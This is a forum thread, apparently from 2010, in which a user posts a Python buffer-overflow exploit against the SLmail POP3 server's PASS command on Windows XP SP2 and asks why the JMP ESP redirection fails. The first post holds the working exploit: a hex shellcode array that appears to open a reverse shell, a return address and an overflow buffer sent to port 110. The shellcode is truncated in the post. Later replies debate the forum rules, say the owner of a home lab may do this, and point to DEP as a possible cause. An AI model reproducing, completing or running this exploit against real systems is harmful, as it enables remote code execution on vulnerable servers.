Page 1 of 2 12 LastLast
Results 1 to 10 of 17

Thread: Please help

  1. #1
    Junior Member
    Join Date
    Jan 2010

    Please help

    The target is an xp sp2 machine running a SLmail server which I know is vulnerable to buffer overflow with the PASS command. So I whipped up the following script:
    import struct
    import socket
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    shellcode =("\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24" +
    "\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f" +
    "\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84" +
    "\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28" +
    "\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c" +
    "\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64" +
    "\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x5e" +
    "\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32" +
    "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50" +
    "\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff" +
    "\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43" +
    "\x53\x43\x53\xff\xd0\x68\xc0\xa8\x02\x6c\x66\x68\x11\x5c" +
    "\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff\xd6\x6a" +
    "\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d\x6a\x50" +
    "\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\x95" +
    "\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab" +
    "\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51" +
    "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05" +
    "\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6" +
    "\x79\xff\x75\x04\xff\xd6\xff\x77\xfc\xff\xd0\x68\xf0\x8a" +
    # where 0x01c7a18b is a JMP ESP in user32.dll on xp sp2
    # buffer = '\x41' * 4654 + struct.pack('<L', 0x01c7a18b) + '\x90' * 16 +shellcode
    buffer = '\x41' * 4654 + '\x42' * 4 + '\x43' * 48
    print "\nSending evil buffer..."
    s.connect (('',110))
    data = s.recv(1024)
    s.send('USER ftp' + '\r\n')
    data = s.recv(1024)
    s.send('PASS ' + buffer + '\r\n')
    data = s.recv(1024)
    the resulting crash shows my four B's sitting pretty in EIP but when I pass the address of a JMP ESP in user32.dll (done in this case by changing the commented line) the resulting crash holds a different address in EIP which does not point towards my shellcode.
    I am certain that some one will point out my stupid mistake easily but I have been working on this all day and still it does not work...
    Thanks in advance for the help,
    Last edited by ey3l45h; January 7th, 2010 at 04:17 PM. Reason: I copied and pasted the wrong version of the script.

  2. #2
    You are obviously going to get banned if you don't remove that. While I am sure you are not going to read this, anyways -
    Parth Maniar,

    *Thank you GOD*

    Greater the Difficulty, SWEETER the Victory.

    Believe in yourself.

  3. #3
    Senior Member gore's Avatar
    Join Date
    Oct 2002
    If he's the owner of the machine he's attempting this on, there isn't any law being broken. Wasn't asked in the best manner, but, if the machine is his, there shouldn't be an issue. Other than others here probably not wanting to answer since we have a corporate owner who has to be responsible for any problems on here. The staff here are generally into the stuff we do here (I mean the staff, the mods obviously have an interest) but their bosses, probably not heh.

  4. #4
    Junior Member
    Join Date
    Jan 2010
    @byte~ I am sorry I did not see any where in the rules where it said that one could not post educational projects. Of course this is for practice on my home lab. If you could please link me to something which shows a rule I have broken I would be the first to remove my post. Thanks for the flaming.
    @gore~ I recognize that I could have worded that better. I have been a long time reader of AO and this was my first post. If you have some advice which would help in the future maybe some other forums which would be able to help I would love to hear it.

    The question still stands I still don't know why the address I am entering is destroying the stack in such a way that I can not get to my JMP ESP.

    k thanx bye,


  5. #5
    Join Date
    Jan 2008
    Doesn't even look like the shell is sent to anything at all. It just looks like an unused string in this script to me.

  6. #6
    Junior Member
    Join Date
    Jan 2010
    @~Spec You are right I was changing a few I am about to edit that... it did get sent in the script that I ran. I accidentally did not add it to the end of the commented line...

  7. #7
    Not sure but can this be any service to you?
    Data Execution Prevention (DEP) is a security feature included in modern Microsoft Windows operating systems that is intended to prevent an application or service from executing code from a non-executable memory region. This helps prevent certain exploits that store code via a buffer overflow, for example.

    I believe metasploit has some wrappers to defeat this protection. Just convert script procedure to your code.

  8. #8
    Senior Member t34b4g5's Avatar
    Join Date
    Sep 2003


    Quote Originally Posted by ey3l45h View Post
    If you could please link me to something which shows a rule I have broken I would be the first to remove my post. Thanks for the flaming.
    Acceptable Use Policy
    (Bottom of the page)

    As Gore mentioned AntiOnline is owned and run by a Corporate Company.

    Copyright 2010 QuinStreet Inc. All Rights Reserved.

    no need to remove the post, i'm interested to see where this goes.

  9. #9
    Senior Member gore's Avatar
    Join Date
    Oct 2002
    I didn't see a problem with it so I left it alone too. He owns the machine and is simply trying to learn something, and isn't breaking any laws since, again, the machine is his, so he can do with it what he likes. So I just left it alone to grow lol.

  10. #10
    Gonzo District BOFH westin's Avatar
    Join Date
    Jan 2006
    SW MO
    I run a ton of scans and exploits against VMs in my home network. I always figured if I had a problem, I could rely on the members of AO to help me out. Just because something could possibly be used for illegal purposes, doesn't mean that it is evil. One of my favorite past times is running exploits against systems, while performing a packet capture, and looking at the results. It is a good way to observe suspicious network activity. From what I can tell the OP doesn't have malicious intent, but is trying to learn how to write/launch exploit code, which in and of itself is not a bad thing. Maybe like learning how to fire a gun... ??
    \"Those of us that had been up all night were in no mood for coffee and donuts, we wanted strong drink.\"


Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts